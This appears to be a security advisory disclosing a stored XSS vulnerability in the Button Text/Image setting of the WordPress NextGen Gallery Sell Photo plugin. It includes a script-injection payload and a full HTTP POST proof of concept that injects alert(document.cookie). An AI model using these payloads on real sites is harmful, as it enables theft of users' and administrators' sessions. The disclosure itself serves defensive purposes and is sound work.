Stored XSS Vulnerability in WordPress NextGen Gallery Sell Photo Plugin

WordPress NextGen Gallery Sell Photo Plugin version 1.0.4 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress NextGen Gallery Sell Photo plugn is used to sell photos directly from NextGen Gallery in WordPress blog with payment through PayPal. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The Button Text/Image field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin.

The image below shows our javascript is being executed when the following string is given in the Button Text/Image field.

Buy Now "><script>alert(0)</script>

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website.

Proof of Concept

POST /w/wp-admin/options-general.php?page=nextgen-sell-photo-settings HTTP/1.1
Host: 127.0.0.1
Content-Length: 336
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/w/wp-admin/options-general.php?page=nextgen-sell-photo-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7Cb6923f10946ffce4a149ff702761391ed5ab2efed419261f5bd9d173281a1d95; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close

_wpnonce=a48671c8bf&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dnextgen-sell-photo-settings&paypal_email=john%40zopmail.com&currency_code=USD&price_amount=5.00&button_anchor=Buy+Now+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&return_url=http%3A%2F%2F127.0.0.1%2Fw&ngsp_update_settings=Save+Changes

Recommendation

All users inputs should be sanitized before it is used.